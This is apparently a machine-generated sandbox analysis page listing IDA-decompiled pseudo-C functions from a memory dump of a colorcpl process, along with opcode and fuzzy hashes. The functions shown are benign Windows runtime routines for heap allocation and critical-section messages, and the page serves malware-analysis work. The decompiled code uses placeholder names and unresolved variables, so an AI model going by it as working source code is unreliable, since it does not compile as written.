                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EA41E8 Relevance: .0, Instructions: 21COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 82%
                                                                                                			E06EA41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x6ef08f0);
				_t5 = E06E6D08C(__ebx, __edi, __esi);
				if( *0x6f087ec == 0) {
					E06E2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x6f087ec == 0) {
						 *0x6f087f0 = 0x6f087ec;
						 *0x6f087ec = 0x6f087ec;
						 *0x6f087e8 = 0x6f087e4;
						 *0x6f087e4 = 0x6f087e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L06EA4248();
				}
				return E06E6D0D1(_t5);
			}





                                                                                                0x06ea41e8
                                                                                                0x06ea41ea
                                                                                                0x06ea41ef
                                                                                                0x06ea41fb
                                                                                                0x06ea4206
                                                                                                0x06ea420b
                                                                                                0x06ea4216
                                                                                                0x06ea421d
                                                                                                0x06ea4222
                                                                                                0x06ea422c
                                                                                                0x06ea4231
                                                                                                0x06ea4231
                                                                                                0x06ea4236
                                                                                                0x06ea423d
                                                                                                0x06ea423d
                                                                                                0x06ea4247

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e146a3fccf7c10f4c25a9a15a9125a4eaa220aa4eb8a9bb321ac9d2abbb3e377
                                                                                                • Instruction ID: b48c84328ab6cb4ea587fa315d601def4afc00c84fb694b59c66b1f0c7a1a7ad
                                                                                                • Opcode Fuzzy Hash: e146a3fccf7c10f4c25a9a15a9125a4eaa220aa4eb8a9bb321ac9d2abbb3e377
                                                                                                • Instruction Fuzzy Hash: E1F01C74B60708CFEFE1DF65D90070436EBF748391F406115923087288D7785448CF16
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E4A185 Relevance: .0, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E4A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x6f067e4 >= 0xa) {
					if(_t5 < 0x6f06800 || _t5 >= 0x6f06900) {
						return L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E06E30010(0x6f067e0, _t5);
				}
			}





                                                                                                0x06e4a190
                                                                                                0x06e4a1a6
                                                                                                0x06e4a1c2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e4a192
                                                                                                0x06e4a192
                                                                                                0x06e4a19f
                                                                                                0x06e4a19f

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 08313365c02ba93ec1e86d50ffce37ced4b3a31c8653361f777e47237765a998
                                                                                                • Instruction ID: a6868b432ffa52fbd11434e5f879eb5de7bd99790efc22c66045f7b2a6d8cd7c
                                                                                                • Opcode Fuzzy Hash: 08313365c02ba93ec1e86d50ffce37ced4b3a31c8653361f777e47237765a998
                                                                                                • Instruction Fuzzy Hash: C6D05BA11A12045AF6ED7724AD58B253257EB84720F30581DF1078BAD8DD54C8F8E109
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E416E0 Relevance: .0, Instructions: 17COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E416E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E06E41710(0x6f067e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L06E34620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                                                0x06e416e8
                                                                                                0x06e416ef
                                                                                                0x06e416f3
                                                                                                0x06e416fe
                                                                                                0x00000000
                                                                                                0x06e41700
                                                                                                0x06e4170d
                                                                                                0x06e4170d
                                                                                                0x06e416f2
                                                                                                0x06e416f2
                                                                                                0x06e416f2
                                                                                                0x06e416f2

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 19ea167ad07747dda89a2a273df5c50402c4907755541ee22379c5bb6733e4a8
                                                                                                • Instruction ID: f329288aa2a4fe01633d9874eea50f87e77e5a832ab6d39b843473186b36848c
                                                                                                • Opcode Fuzzy Hash: 19ea167ad07747dda89a2a273df5c50402c4907755541ee22379c5bb6733e4a8
                                                                                                • Instruction Fuzzy Hash: 81D0A73111034092DEAD6F24AC08B642256DB80785F38109CF117494C0CFB4DCE2E448
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E953CA Relevance: .0, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E953CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E06E2EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                                                0x06e953ca
                                                                                                0x06e953ce
                                                                                                0x06e953d9
                                                                                                0x06e953de
                                                                                                0x06e953e1
                                                                                                0x06e953e1
                                                                                                0x06e953e6
                                                                                                0x06e953f3
                                                                                                0x00000000
                                                                                                0x06e953f8
                                                                                                0x06e953fb

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                • Instruction ID: 045f17f8baad3c15078d17c0ca59665a1a5521a86f5b08701358f1d4df10fb57
                                                                                                • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                • Instruction Fuzzy Hash: F1E08C729007849BCF93EB58CA54F4EB7F9FF44B00F140004A4085B660C624AC00CB00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E435A1 Relevance: .0, Instructions: 12COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E435A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E06E2EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                                                0x06e435a1
                                                                                                0x06e435a1
                                                                                                0x06e435a5
                                                                                                0x06e435ab
                                                                                                0x06e435ab
                                                                                                0x06e435b5
                                                                                                0x00000000
                                                                                                0x06e435c1
                                                                                                0x06e435b7

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                • Instruction ID: 7bddfded89f577e1b8111aa6350762ff8a29098abfe25b0398be02eacaeea527
                                                                                                • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                • Instruction Fuzzy Hash: F3D0A9328113809EEBD1BB31E6187A833B6BB00208F58306580120685AC33E4A0ACA00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E2AAB0 Relevance: .0, Instructions: 12COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E2AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                                                0x06e2aab6
                                                                                                0x06e2aabb
                                                                                                0x06e7a442
                                                                                                0x00000000
                                                                                                0x06e7a448
                                                                                                0x06e7a454
                                                                                                0x06e7a454
                                                                                                0x06e2aac1
                                                                                                0x06e2aac1
                                                                                                0x06e2aac6
                                                                                                0x06e2aac6

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                • Instruction ID: da6a200727e03202b9eb3f9c7aa52030802602f038d49c6cda6d9309cc0877b3
                                                                                                • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                • Instruction Fuzzy Hash: 9AD0C935352A80CFD756CB0CC554B0533A5BB04B44FC504A0E400CB721E62CD944CA00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E9A537 Relevance: .0, Instructions: 11COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E9A537(intOrPtr _a4, intOrPtr _a8) {

				return L06E38E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                                                0x06e9a553

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                • Instruction ID: f058f84418147cfe2f3ee7256c0d4391ed01f36f8e48ccab4206b1e837e79824
                                                                                                • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                • Instruction Fuzzy Hash: 47C01232080248BBCB526E82CC00F067B2AEB94B60F008010BA180A5608632E970EA84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E1DB40 Relevance: .0, Instructions: 11COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E1DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L06E34620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                                                0x06e1db4d
                                                                                                0x06e1db54
                                                                                                0x06e1db5f
                                                                                                0x06e1db56
                                                                                                0x06e1db56
                                                                                                0x06e1db5c
                                                                                                0x06e1db5c

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                • Instruction ID: a9c12ed861fcb5d35729b0f6f8afcc082a2fb71d7bdf5dfbe68b8a51f36df17c
                                                                                                • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                • Instruction Fuzzy Hash: 0FC08C70290B00AAEBA21F20CD01F0036A4BB00B05F4400A06301DA0F0DB78D802E600
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E276E2 Relevance: .0, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E276E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                                                0x06e276e4
                                                                                                0x00000000
                                                                                                0x06e276f8
                                                                                                0x06e276fd

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                • Instruction ID: cdb9880d20d436904a937ef6153027a7cbfc2b72b7f76e533fd663ceb93cdaf5
                                                                                                • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                • Instruction Fuzzy Hash: 26C08CB05613955AEFAA5709CE64B203655AF0860DF48219CAA02094E1C368A802C208
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E436CC Relevance: .0, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E436CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                                                0x06e436d2
                                                                                                0x06e436e8
                                                                                                0x06e436d4
                                                                                                0x06e436e5
                                                                                                0x06e436e5

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                • Instruction ID: 70b9a24a0005c2c74125579c885a63cbfa5d2c02ccc1e08db9cf7c8e78d4db69
                                                                                                • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                • Instruction Fuzzy Hash: 78C02B70170940FBE7556F30CD01F147298F700A61F6403D47230454F0D5389C00D100
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E1AD30 Relevance: .0, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E1AD30(intOrPtr _a4) {

				return L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                                                0x06e1ad49

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                • Instruction ID: 2ad95bde4cbb21fe4e03501dc685bbf93a071bc89af2b7a2d48149ff6100e776
                                                                                                • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                • Instruction Fuzzy Hash: 86C08C32080248BBCB126A45CD00F017B2DEB90B60F000020B6040A6A18932E860D588
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E33A1C Relevance: .0, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E33A1C(intOrPtr _a4) {
				void* _t5;

				return L06E34620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                                                0x06e33a35

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                • Instruction ID: 5096536ac46ca2ab6b7884ef7a76c628920a63b7844294d21080a6f96e7714ee
                                                                                                • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                • Instruction Fuzzy Hash: 0EC08C32080648BBC7126E41DC00F017B6DE790B60F000020B6040A5A08532EC60D588
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E37D50 Relevance: .0, Instructions: 7COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E37D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                                                0x06e37d56
                                                                                                0x06e37d5b
                                                                                                0x06e37d60
                                                                                                0x06e37d5d
                                                                                                0x06e37d5d
                                                                                                0x06e37d5d

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                • Instruction ID: 59555366d6ff7dfc388b86552d8999e8b6a776c90bb0539a14c1c0b0eb8ddf5c
                                                                                                • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                • Instruction Fuzzy Hash: 48B09234321A408FCE56DF18C084B1533F4BB45A44B8400D0E400CBA20D329E800C904
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E42ACB Relevance: .0, Instructions: 5COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E42ACB() {
				void* _t5;

				return E06E2EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                                                0x06e42adc

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                • Instruction ID: 1290e4339d0b79c90c895b545517be9e3d667e65668cbac86bfc457d59e33aef
                                                                                                • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                • Instruction Fuzzy Hash: 75B01233C10661CFCF92EF40CA10B197336FB00750F054490901127930C228AC01CB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EAFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 53%
                                                                                                			E06EAFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E06E5CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E06EA5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E06EA5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                0x06eafdda
                                                                                                0x06eafde2
                                                                                                0x06eafde5
                                                                                                0x06eafdec
                                                                                                0x06eafdfa
                                                                                                0x06eafdff
                                                                                                0x06eafe0a
                                                                                                0x06eafe0f
                                                                                                0x06eafe17
                                                                                                0x06eafe1e
                                                                                                0x06eafe19
                                                                                                0x06eafe19
                                                                                                0x06eafe19
                                                                                                0x06eafe20
                                                                                                0x06eafe21
                                                                                                0x06eafe22
                                                                                                0x06eafe25
                                                                                                0x06eafe40

                                                                                                APIs
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 06EAFDFA
                                                                                                Strings
                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 06EAFE2B
                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 06EAFE01
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                • API String ID: 885266447-3903918235
                                                                                                • Opcode ID: 5e11c4529f1bc242e3d71118827fadcc4aa9fd10f76f055d0ea492d07ba6cf86
                                                                                                • Instruction ID: 29f437db9d5fe8f29ce78d83dbab33ab3a627c13fd0ed7d934ff27e27e777b12
                                                                                                • Opcode Fuzzy Hash: 5e11c4529f1bc242e3d71118827fadcc4aa9fd10f76f055d0ea492d07ba6cf86
                                                                                                • Instruction Fuzzy Hash: 87F0F632600301BFEAA01A45DC06F33BF5EEB44730F245315F6285A1D1EAA2F960C6F4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%